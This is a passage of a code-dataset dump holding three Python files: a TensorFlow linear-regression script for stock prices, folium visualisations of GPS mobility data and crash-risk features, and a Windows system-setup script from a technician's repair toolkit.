data\r\n from the California housing data set.\r\n Returns:\r\n A DataFrame that contains the target feature.\r\n \"\"\"\r\n output_targets = pd.DataFrame()\r\n # Scale the target to be in units of thousands of dollars.\r\n output_targets[\"tw_Adj_Close\"] = (\r\n ecnm_dataframe[\"tw_Adj_Close\"] / 1000.0)\r\n return output_targets\r\n\r\ntraining_examples = preprocess_features(ecnm_dataframe.head(2000))\r\n#training_examples.describe()\r\n\r\ntraining_targets = preprocess_targets(ecnm_dataframe.head(2000))\r\n#training_targets.describe()\r\n\r\nvldlt = ecnm_dataframe.tail(3185)\r\nvldft = vldlt.head(2000)\r\nvalidation_examples = preprocess_features(vldft)\r\n#validation_examples.describe()\r\n\r\nvalidation_targets = preprocess_targets(vldft)\r\n#validation_targets.describe()\r\n\r\n\r\ndef my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):\r\n \"\"\"Trains a linear regression model of multiple features.\r\n \r\n Args:\r\n features: pandas DataFrame of features\r\n targets: pandas DataFrame of targets\r\n batch_size: Size of batches to be passed to the model\r\n shuffle: True or False. Whether to shuffle the data.\r\n num_epochs: Number of epochs for which data should be repeated. None = repeat indefinitely\r\n Returns:\r\n Tuple of (features, labels) for next data batch\r\n \"\"\"\r\n \r\n # Convert pandas data into a dict of np arrays.\r\n features = {key:np.array(value) for key,value in dict(features).items()} \r\n \r\n # Construct a dataset, and configure batching/repeating.\r\n ds = Dataset.from_tensor_slices((features,targets)) # warning: 2GB limit\r\n ds = ds.batch(batch_size).repeat(num_epochs)\r\n \r\n # Shuffle the data, if specified.\r\n if shuffle:\r\n ds = ds.shuffle(10000)\r\n \r\n # Return the next batch of data.\r\n features, labels = ds.make_one_shot_iterator().get_next()\r\n return features, labels\r\n\r\ndef construct_feature_columns(input_features):\r\n \"\"\"Construct the TensorFlow Feature Columns.\r\n\r\n Args:\r\n input_features: The names of the numerical input features to use.\r\n Returns:\r\n A set of feature columns\r\n \"\"\" \r\n return set([tf.feature_column.numeric_column(my_feature)\r\n for my_feature in input_features])\r\n \r\ndef train_model(\r\n learning_rate,\r\n steps,\r\n batch_size,\r\n training_examples,\r\n training_targets,\r\n validation_examples,\r\n validation_targets):\r\n \"\"\"Trains a linear regression model of multiple features.\r\n \r\n In addition to training, this function also prints training progress information,\r\n as well as a plot of the training and validation loss over time.\r\n \r\n Args:\r\n learning_rate: A `float`, the learning rate.\r\n steps: A non-zero `int`, the total number of training steps. A training step\r\n consists of a forward and backward pass using a single batch.\r\n batch_size: A non-zero `int`, the batch size.\r\n training_examples: A `DataFrame` containing one or more columns from\r\n `california_housing_dataframe` to use as input features for training.\r\n training_targets: A `DataFrame` containing exactly one column from\r\n `california_housing_dataframe` to use as target for training.\r\n validation_examples: A `DataFrame` containing one or more columns from\r\n `california_housing_dataframe` to use as input features for validation.\r\n validation_targets: A `DataFrame` containing exactly one column from\r\n `california_housing_dataframe` to use as target for validation.\r\n \r\n Returns:\r\n A `LinearRegressor` object trained on the training data.\r\n \"\"\"\r\n\r\n periods = 10\r\n steps_per_period = steps / periods\r\n \r\n # Create a linear regressor object.\r\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\r\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\r\n linear_regressor = tf.estimator.LinearRegressor(\r\n feature_columns=construct_feature_columns(training_examples),\r\n optimizer=my_optimizer\r\n )\r\n \r\n # Create input functions.\r\n training_input_fn = lambda: my_input_fn(\r\n training_examples, \r\n training_targets[\"tw_Adj_Close\"], \r\n batch_size=batch_size)\r\n predict_training_input_fn = lambda: my_input_fn(\r\n training_examples, \r\n training_targets[\"tw_Adj_Close\"], \r\n num_epochs=1, \r\n shuffle=False)\r\n predict_validation_input_fn = lambda: my_input_fn(\r\n validation_examples, validation_targets[\"tw_Adj_Close\"], \r\n num_epochs=1, \r\n shuffle=False)\r\n\r\n # Train the model, but do so inside a loop so that we can periodically assess\r\n # loss metrics.\r\n print(\"Training model...\")\r\n print(\"RMSE (on training data):\")\r\n training_rmse = []\r\n validation_rmse = []\r\n for period in range (0, periods):\r\n # Train the model, starting from the prior state.\r\n linear_regressor.train(\r\n input_fn=training_input_fn,\r\n steps=steps_per_period,\r\n )\r\n # Take a break and compute predictions.\r\n training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)\r\n training_predictions = np.array([item['predictions'][0] for item in training_predictions])\r\n \r\n validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)\r\n validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])\r\n \r\n \r\n # Compute training and validation loss.\r\n training_root_mean_squared_error = math.sqrt(\r\n metrics.mean_squared_error(training_predictions, training_targets))\r\n validation_root_mean_squared_error = math.sqrt(\r\n metrics.mean_squared_error(validation_predictions, validation_targets))\r\n # Occasionally print the current loss.\r\n print(\" period %02d : %0.2f\" % (period, training_root_mean_squared_error))\r\n # Add the loss metrics from this period to our list.\r\n training_rmse.append(training_root_mean_squared_error)\r\n validation_rmse.append(validation_root_mean_squared_error)\r\n print(\"Model training finished.\")\r\n\r\n # Output a graph of loss metrics over periods.\r\n plt.ylabel(\"RMSE\")\r\n plt.xlabel(\"Periods\")\r\n plt.title(\"Root Mean Squared Error vs. Periods\")\r\n plt.tight_layout()\r\n plt.plot(training_rmse, label=\"training\")\r\n plt.plot(validation_rmse, label=\"validation\")\r\n plt.legend()\r\n\r\n return linear_regressor\r\n\r\nlinear_regressor = train_model(\r\n learning_rate=0.001,\r\n steps=1000,\r\n batch_size=1,\r\n training_examples=training_examples,\r\n training_targets=training_targets,\r\n validation_examples=validation_examples,\r\n validation_targets=validation_targets)\r\n\r\n","sub_path":"sleftry/ecnm_ml/ecnm_tf_validation (2).py","file_name":"ecnm_tf_validation (2).py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"136238894","text":"import bezier\nimport colormap\nimport webbrowser\nimport numpy as np\nimport pandas as pd\nimport colorlover as cl\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimport folium\nfrom folium.plugins import HeatMap\n\nc_lat, c_lon = None, None\n\n\ndef visualize_points(filename, points, tiles='stamentoner', zoom_start=11):\n global c_lat, c_lon\n c_lat, c_lon = np.mean(points, axis=0)\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n HeatMap(np.c_[points[:, 1], points[:, 0]],\n min_opacity=0.5, max_zoom=15, max_val=1.0, radius=15, blur=15).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Raw GPS Points</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_trajectories(filename, trajectories, tiles='stamentoner', zoom_start=11):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[traj.start_point()[1], traj.start_point()[0]] for traj in trajectories.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n\n for tid, traj in trajectories.items():\n folium.PolyLine([[p[1], p[0]] for p in traj.object]).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Reconstructed Trajectories</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_stops(filename, trajectories, tiles='stamentoner', zoom_start=11, radius=50):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[traj.start_point()[1], traj.start_point()[0]] for traj in trajectories.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n lat_list = list()\n lon_list = list()\n for tid, traj in trajectories.items():\n lat_list.append(traj.object[-1][1])\n lon_list.append(traj.object[-1][0])\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i in range(0, len(trajectories)):\n folium.Circle(location=(lat_list[i], lon_list[i]), radius=radius, fill=True, fill_opacity=0.8).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Stop Points</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef visualize_locations(filename, location_prototype, location_features, tiles='stamentoner', zoom_start=11,\n q=np.array([0.0, 0.25, 0.50, 0.75, 1.0])):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[p[1], p[0]] for p in location_prototype.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n lat_list = list()\n lon_list = list()\n sup_list = list()\n for lid, p in location_prototype.items():\n lat_list.append(p[1])\n lon_list.append(p[0])\n sup_list.append(np.sqrt(location_features[lid]['loc_support'] * 10000))\n\n sup_colors = pd.qcut(sup_list, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Blues'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(sup_list, q=q, labels=colors, duplicates='drop')\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i in range(0, len(location_prototype)):\n folium.Circle(\n location=(lat_list[i], lon_list[i]),\n radius=sup_list[i],\n color=sup_colors[i],\n fill=True,\n fill_color=sup_colors[i],\n fill_opacity=0.8\n ).add_to(m)\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Detected Locations</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef get_bearing(p1, p2):\n '''\n Returns compass bearing from p1 to p2\n\n Parameters\n p1 : namedtuple with lat lon\n p2 : namedtuple with lat lon\n\n Return\n compass bearing of type float\n\n Notes\n Based on https://gist.github.com/jeromer/2005586\n '''\n\n long_diff = np.radians(p2[0] - p1[0])\n\n lat1 = np.radians(p1[1])\n lat2 = np.radians(p2[1])\n\n x = np.sin(long_diff) * np.cos(lat2)\n y = (np.cos(lat1) * np.sin(lat2)\n - (np.sin(lat1) * np.cos(lat2)\n * np.cos(long_diff)))\n bearing = np.degrees(np.arctan2(x, y))\n\n # adjusting for compass bearing\n if bearing < 0:\n return bearing + 360\n return bearing\n\n\ndef visualize_imn(filename, location_nextlocs, location_prototype, location_features,\n tiles='stamentoner', zoom_start=11, q=np.array([0.0, 0.25, 0.50, 0.75, 1.0])):\n global c_lat, c_lon\n if c_lat is None:\n points = np.array([[p[1], p[0]] for p in location_prototype.values()])\n c_lat, c_lon = np.mean(points, axis=0)\n\n fmov = list()\n weight = list()\n for lid1 in location_nextlocs:\n for lid2 in location_nextlocs[lid1]:\n s = location_prototype[lid1]\n e = location_prototype[lid2]\n gap = 0.05 * abs(e[1] - s[1]) / 0.05\n nodes = np.asfortranarray([\n [s[1], (s[1] + e[1]) / 2 + np.random.choice([gap, -gap]), e[1]],\n [s[0], (s[0] + e[0]) / 2 + np.random.choice([gap, -gap]), e[0]],\n ])\n curve = bezier.Curve(nodes, degree=2)\n val = curve.evaluate_multi(np.linspace(0.0, 1.0, 10))\n x_val = val[0]\n y_val = val[1]\n mov = list()\n for xv, yv in zip(x_val, y_val):\n mov.append([xv, yv])\n\n fmov.append(mov)\n weight.append(np.log(location_nextlocs[lid1][lid2] * 10))\n\n sup_colors = pd.qcut(weight, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Greens'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(weight, q=q, labels=colors, duplicates='drop')\n\n m = folium.Map(location=[c_lon, c_lat], tiles=tiles, zoom_start=zoom_start)\n for i, fm in enumerate(fmov):\n folium.PolyLine(fm, color=sup_colors[i], weight=weight[i], opacity=0.8).add_to(m)\n s, e = fm[0], fm[-2]\n rotation = get_bearing(s, e) - 90\n folium.RegularPolygonMarker(location=e, color=sup_colors[i], fill=True, fill_color=sup_colors[i],\n fill_opacity=0.8, number_of_sides=3, radius=6, rotation=rotation).add_to(m)\n\n lat_list = list()\n lon_list = list()\n sup_list = list()\n for lid, p in location_prototype.items():\n lat_list.append(p[1])\n lon_list.append(p[0])\n sup_list.append(np.sqrt(location_features[lid]['loc_support'] * 10000))\n\n sup_colors = pd.qcut(sup_list, q=q, duplicates='drop')\n colors = list(cl.scales['9']['seq']['Blues'])[9 - len(sup_colors.categories):]\n sup_colors = pd.qcut(sup_list, q=q, labels=colors, duplicates='drop')\n\n for i in range(0, len(lon_list)):\n folium.Circle(location=(lat_list[i], lon_list[i]), radius=sup_list[i], color=sup_colors[i], fill=True,\n fill_color=sup_colors[i], fill_opacity=0.8).add_to(m)\n\n title_html = \"\"\"<div style=\"position: fixed; \n top: 20px; left: 50px; width: 800px; height: 90px; \n z-index:9999; font-size:40px; font-weight:bold; color: #3175b7\">Individual Mobility Network</div>\"\"\"\n m.get_root().html.add_child(folium.Element(title_html))\n\n m.save(filename)\n webbrowser.open('file://%s' % filename)\n\n\ndef cl2hex(c):\n r, g, b = c\n r, g, b = int(r), int(g), int(b)\n return colormap.rgb2hex(r, g, b)\n\n\ndef visualize_features(filename, user_features, df_train, features):\n features_map = dict()\n for ft, flist in features.items():\n for f in flist:\n features_map[f] = ft\n\n vals = list()\n names = list()\n mean_values = df_train.mean().to_dict()\n max_values = df_train.max().to_dict()\n min_values = df_train.min().to_dict()\n\n for f, v in user_features.items():\n if f in ['uid', 'crash']:\n continue\n if np.isnan(v) or np.isinf(v) or v == -1 or max_values[f] == min_values[f] or np.isinf(\n min_values[f]) or np.isinf(max_values[f]):\n vals.append(0)\n else:\n v1 = (v - min_values[f]) / (max_values[f] - min_values[f])\n v2 = (mean_values[f] - min_values[f]) / (max_values[f] - min_values[f])\n d = v1 - v2\n vals.append(d)\n names.append('%s-%s' % (features_map[f], f))\n\n gap = (max(vals) - min(vals)) / 6\n bins = np.arange(min(vals), max(vals), gap)\n color_scale = list(cl.to_numeric(cl.scales[str(len(bins) - 1)]['div']['RdYlGn']))\n color_scale = [cl2hex(c) for c in color_scale]\n colors = pd.cut(vals, bins=bins, labels=color_scale)\n colors = [c if not isinstance(c, float) else color_scale[3] for c in colors]\n\n fetures_per_plot = 20\n fig = plt.figure(figsize=(50, 40))\n fontsize = 13\n\n pid = 0\n for cid in range(0, 3):\n for rid in range(0, 7):\n plt.subplot(3, 7, pid + 1)\n ifrom = pid * fetures_per_plot\n ito = pid * fetures_per_plot + fetures_per_plot\n svals = vals[ifrom:ito]\n snames = names[ifrom:ito]\n scolors = colors[ifrom:ito]\n\n x = np.arange(len(svals))\n plt.barh(x, svals, color=scolors)\n for i, v, n in zip(x, svals, snames):\n if v < 0:\n plt.text(0.01, i, n, fontsize=fontsize)\n elif v > 0:\n plt.text(-0.01, i, n, horizontalalignment='right', fontsize=fontsize)\n elif v == 0:\n plt.text(0.01, i, n, horizontalalignment='center', fontsize=fontsize)\n plt.axvline(0, color='k')\n plt.axis('off')\n plt.xlim(min(vals), max(vals))\n pid += 1\n\n st = fig.suptitle('Final Features', fontsize=fontsize*10)\n fig.tight_layout()\n st.set_y(0.95)\n fig.subplots_adjust(top=0.85)\n plt.savefig(filename, format='png', bbox_inches='tight')\n plt.close()\n browser = webbrowser.get('chrome')\n browser.open('file://%s' % filename)\n\n\ndef visualize_crash_risk(filename, uid, area, period, crash_proba, path):\n odo_idx = int((1.0-crash_proba) * 6)\n img = mpimg.imread(path + 'fig/odometer/odometer_%s.png' % odo_idx)\n plt.imshow(img)\n plt.title('User %s - %s - %s - Crash Risk: %.2f' % (\n uid, area.capitalize(), period.capitalize(), crash_proba), fontsize=16)\n plt.axis('off')\n plt.savefig(filename, format='png', bbox_inches='tight')\n plt.close()\n browser = webbrowser.get('chrome')\n browser.open('file://%s' % filename)\n","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"102635675","text":"'''Wizard Kit: System Setup'''\n# pylint: disable=wildcard-import,wrong-import-position\n# vim: sts=2 sw=2 ts=2\n\nimport os\nimport sys\n\n# Init\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nfrom collections import OrderedDict\nfrom functions.activation import *\nfrom functions.browsers import *\nfrom functions.cleanup import *\nfrom functions.info import *\nfrom functions.product_keys import *\nfrom functions.setup import *\nfrom functions.sw_diags import *\nfrom functions.windows_updates import *\ninit_global_vars()\nos.system('title {}: System Setup'.format(KIT_NAME_FULL))\nset_log_file('System Setup.log')\n\n\n# STATIC VARIABLES\n# pylint: disable=bad-whitespace,line-too-long\nOTHER_RESULTS = {\n 'Error': {\n 'BIOSKeyNotFoundError': 'BIOS KEY NOT FOUND',\n 'CalledProcessError': 'UNKNOWN ERROR',\n 'FileNotFoundError': 'FILE NOT FOUND',\n 'GenericError': 'UNKNOWN ERROR',\n 'Not4KAlignedError': 'FALSE',\n 'SecureBootDisabledError': 'DISABLED',\n 'WindowsUnsupportedError': 'UNSUPPORTED',\n },\n 'Warning': {\n 'GenericRepair': 'REPAIRED',\n 'NoProfilesError': 'NO PROFILES FOUND',\n 'NotInstalledError': 'NOT INSTALLED',\n 'OSInstalledLegacyError': 'OS INSTALLED LEGACY',\n 'SecureBootNotAvailError': 'NOT AVAILABLE',\n 'SecureBootUnknownError': 'UNKNOWN',\n 'UnsupportedOSError': 'UNSUPPORTED OS',\n 'WindowsOutdatedError': 'OUTDATED',\n },\n }\nSETUP_ACTIONS = OrderedDict({\n # Install software\n 'Installing Programs': {'Info': True},\n 'VCR': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_vcredists, 'Just run': True,},\n 'LibreOffice': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_libreoffice,\n 'If answer': 'LibreOffice', 'KWArgs': {'quickstart': False, 'register_mso_types': True, 'use_mso_formats': False, 'vcredist': False},\n },\n 'Ninite bundle': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_ninite_bundle, 'KWArgs': {'cs': 'STARTED'},},\n\n # Browsers\n 'Scanning for browsers': {'Info': True},\n 'Scan': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': scan_for_browsers, 'Just run': True, 'KWArgs': {'skip_ie': True},},\n 'Backing up browsers': {'Info': True},\n 'Backup browsers': {'New': False, 'Dat': True, 'Cur': True, 'HW': False, 'Function': backup_browsers, 'Just run': True,},\n\n # Install extensions\n 'Installing Extensions': {'Info': True},\n 'Classic Shell skin': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Function': install_classicstart_skin, 'Win10 only': True,},\n 'Chrome extensions': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_chrome_extensions,},\n 'Firefox extensions': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_firefox_extensions,},\n\n # Configure software'\n 'Configuring Programs': {'Info': True},\n 'Browser add-ons': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': install_adblock, 'Just run': True,\n 'Pause': 'Please enable uBlock Origin for all browsers',\n },\n 'Classic Start': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Function': config_classicstart, 'Win10 only': True,},\n 'Config Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': config_windows_updates, 'Win10 only': True,},\n 'Enable Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': enable_windows_updates, 'KWArgs': {'silent': True},},\n 'Explorer (system)': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': config_explorer_system, 'Win10 only': True,},\n 'Explorer (user)': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': config_explorer_user, 'Win10 only': True,},\n 'Restart Explorer': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': restart_explorer,},\n 'Restore default UAC': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': restore_default_uac,},\n 'Update Clock': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': update_clock,},\n\n # Cleanup\n 'Cleaning up': {'Info': True},\n 'AdwCleaner': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': cleanup_adwcleaner,},\n 'Desktop': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': cleanup_desktop,},\n 'KIT_NAME_FULL': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': delete_empty_folders,},\n\n # System Info\n 'Exporting system info': {'Info': True},\n 'AIDA64 Report': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': run_aida64,},\n 'File listing': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': backup_file_list,},\n 'Power plans': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': backup_power_plans,},\n 'Product Keys': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_produkey,},\n 'Registry': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': backup_registry,},\n\n # Show Summary\n 'Summary': {'Info': True},\n 'Operating System': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_os_name, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_os_activation, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'BIOS Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': activate_with_bios, 'If not activated': True,},\n 'Secure Boot': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': check_secure_boot_status, 'KWArgs': {'show_alert': False},},\n 'Installed RAM': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_installed_ram, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Temp size': {'New': False, 'Dat': False, 'Cur': True, 'HW': False, 'Function': show_temp_files_size, 'KWArgs': {'ns': 'UNKNOWN', 'silent_function': False},},\n 'Show free space': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': show_free_space, 'Just run': True,},\n 'Installed AV': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': get_installed_antivirus, 'KWArgs': {'ns': 'UNKNOWN', 'print_return': True},},\n 'Installed Office': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': get_installed_office, 'KWArgs': {'ns': 'UNKNOWN', 'print_return': True},},\n 'Partitions 4K aligned': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': check_4k_alignment, 'KWArgs': {'cs': 'TRUE', 'ns': 'FALSE'},},\n\n # Open things\n 'Opening Programs': {'Info': True},\n 'Device Manager': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': open_device_manager, 'KWArgs': {'cs': 'STARTED'},},\n 'HWiNFO sensors': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_hwinfo_sensors, 'KWArgs': {'cs': 'STARTED'},},\n 'Speed test': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': open_speedtest, 'KWArgs': {'cs': 'STARTED'},},\n 'Windows Updates': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': open_windows_updates, 'KWArgs': {'cs': 'STARTED'},},\n 'Windows Activation': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Function': open_windows_activation, 'If not activated': True, 'KWArgs': {'cs': 'STARTED'},},\n 'Sleep': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': sleep, 'Just run': True, 'KWArgs': {'seconds': 3},},\n 'XMPlay': {'New': True, 'Dat': True, 'Cur': True, 'HW': True, 'Function': run_xmplay, 'KWArgs': {'cs': 'STARTED'},},\n })\nSETUP_ACTION_KEYS = (\n 'Function',\n 'If not activated',\n 'Info',\n 'Just run',\n 'KWArgs',\n 'Pause',\n )\nSETUP_QUESTIONS = {\n # AV\n 'MSE': {'New': None, 'Dat': None, 'Cur': None, 'HW': False, 'Ninite': True},\n\n # LibreOffice\n 'LibreOffice': {'New': None, 'Dat': None, 'Cur': None, 'HW': False, 'Ninite': True},\n\n # Ninite\n 'Base': {'New': True, 'Dat': True, 'Cur': True, 'HW': False, 'Ninite': True},\n 'Missing': {'New': False, 'Dat': True, 'Cur': False, 'HW': False, 'Ninite': True},\n 'Standard': {'New': True, 'Dat': True, 'Cur': False, 'HW': False, 'Ninite': True},\n }\n# pylint: enable=bad-whitespace,line-too-long\n\n\n# Functions\ndef check_os_and_abort():\n \"\"\"Check OS and prompt to abort if not supported.\"\"\"\n result = try_and_print(\n message='OS support status...',\n function=check_os_support_status,\n cs='GOOD',\n )\n if not result['CS'] and 'Unsupported' in result['Error']:\n print_warning('OS version not supported by this script')\n if not ask('Continue anyway? (NOT RECOMMENDED)'):\n abort()\n\n\ndef get_actions(setup_mode, answers):\n \"\"\"Get actions to perform based on setup_mode, returns OrderedDict.\"\"\"\n actions = OrderedDict({})\n for _key, _val in SETUP_ACTIONS.items():\n _action = {}\n _if_answer = _val.get('If answer', False)\n _win10_only = _val.get('Win10 only', False)\n\n # Set enabled status\n _enabled = _val.get(setup_mode, False)\n if _if_answer:\n _enabled = _enabled and answers[_if_answer]\n if _win10_only:\n _enabled = _enabled and global_vars['OS']['Version'] == '10'\n _action['Enabled'] = _enabled\n\n # Set other keys\n for _sub_key in SETUP_ACTION_KEYS:\n _action[_sub_key] = _val.get(_sub_key, None)\n\n # Fix KWArgs\n if _action.get('KWArgs', {}) is None:\n _action['KWArgs'] = {}\n\n # Handle \"special\" actions\n if _key == 'KIT_NAME_FULL':\n # Cleanup WK folders\n _key = KIT_NAME_FULL\n _action['KWArgs'] = {'folder_path': global_vars['ClientDir']}\n elif _key == 'Ninite bundle':\n # Add install_ninite_bundle() kwargs\n _action['KWArgs'].update({\n kw.lower(): kv for kw, kv in answers.items()\n if SETUP_QUESTIONS.get(kw, {}).get('Ninite', False)\n })\n elif _key == 'Explorer (user)':\n # Explorer settings (user)\n _action['KWArgs'] = {'setup_mode': setup_mode}\n\n # Add to dict\n actions[_key] = _action\n\n return actions\n\n\ndef get_answers(setup_mode):\n \"\"\"Get setup answers based on setup_mode and user input, returns dict.\"\"\"\n answers = {k: v.get(setup_mode, False) for k, v in SETUP_QUESTIONS.items()}\n\n # Answer setup questions as needed\n if answers['MSE'] is None and global_vars['OS']['Version'] == '7':\n answers.update(get_av_selection())\n\n if answers['LibreOffice'] is None:\n answers['LibreOffice'] = ask('Install LibreOffice?')\n\n return answers\n\n\ndef get_av_selection():\n \"\"\"Get AV selection.\"\"\"\n av_answers = {\n 'MSE': False,\n }\n av_options = [\n {\n 'Name': 'Microsoft Security Essentials',\n 'Disabled': global_vars['OS']['Version'] not in ['7'],\n },\n ]\n actions = [\n {'Name': 'None', 'Letter': 'N'},\n {'Name': 'Quit', 'Letter': 'Q'},\n ]\n\n # Show menu\n selection = menu_select(\n 'Please select an option to install',\n main_entries=av_options,\n action_entries=actions)\n if selection.isnumeric():\n index = int(selection) - 1\n if 'Microsoft' in av_options[index]['Name']:\n av_answers['MSE'] = True\n elif selection == 'Q':\n abort()\n\n return av_answers\n\n\ndef get_mode():\n \"\"\"Get mode via menu_select, returns str.\"\"\"\n setup_mode = None\n mode_options = [\n {'Name': 'New', 'Display Name': 'New / Clean install (no data)'},\n {'Name': 'Dat', 'Display Name': 'Clean install with data migration'},\n {'Name': 'Cur', 'Display Name': 'Original OS (post-repair or overinstall)'},\n {'Name': 'HW', 'Display Name': 'Hardware service (i.e. no software work)'},\n ]\n actions = [\n {'Name': 'Quit', 'Letter': 'Q'},\n ]\n\n # Get selection\n selection = menu_select(\n 'Please select a setup mode',\n main_entries=mode_options,\n action_entries=actions)\n if selection.isnumeric():\n index = int(selection) - 1\n setup_mode = mode_options[index]['Name']\n elif selection == 'Q':\n abort()\n\n return setup_mode\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n stay_awake()\n clear_screen()\n\n # Check installed OS\n check_os_and_abort()\n\n # Get setup mode\n setup_mode = get_mode()\n\n # Get answers to setup questions\n answers = get_answers(setup_mode)\n\n # Get actions to perform\n actions = get_actions(setup_mode, answers)\n\n # Perform actions\n for action, values in actions.items():\n kwargs = values.get('KWArgs', {})\n\n # Print info lines\n if values.get('Info', False):\n print_info(action)\n continue\n\n # Print disabled actions\n if not values.get('Enabled', False):\n show_data(\n message='{}...'.format(action),\n data='DISABLED',\n warning=True,\n )\n continue\n\n # Check Windows activation if requested\n if values.get('If not activated', False) and windows_is_activated():\n # Skip\n continue\n\n # Run function\n if values.get('Just run', False):\n values['Function'](**kwargs)\n else:\n result = try_and_print(\n message='{}...'.format(action),\n function=values['Function'],\n other_results=OTHER_RESULTS,\n **kwargs)\n\n # Wait for Ninite proc(s)\n if action == 'Ninite bundle':\n print_standard('Waiting for installations to finish...')\n try:\n for proc in result['Out']:\n proc.wait()\n except KeyboardInterrupt:\n pass\n\n # Pause\n if values.get('Pause', False):\n print_standard(values['Pause'])\n pause()\n\n # Show alert box for SecureBoot issues\n try:\n check_secure_boot_status(show_alert=True)\n except Exception: # pylint: disable=broad-except\n # Ignoring exceptions since we just want to show the popup\n pass\n\n # Done\n pause('Press Enter to exit... ')\n\n\nif __name__ == '__main__':\n try:\n main()\n exit_script()\n except SystemExit as sys_exit:\n exit_script(sys_exit.code)\n except: # pylint: disable=bare-except\n 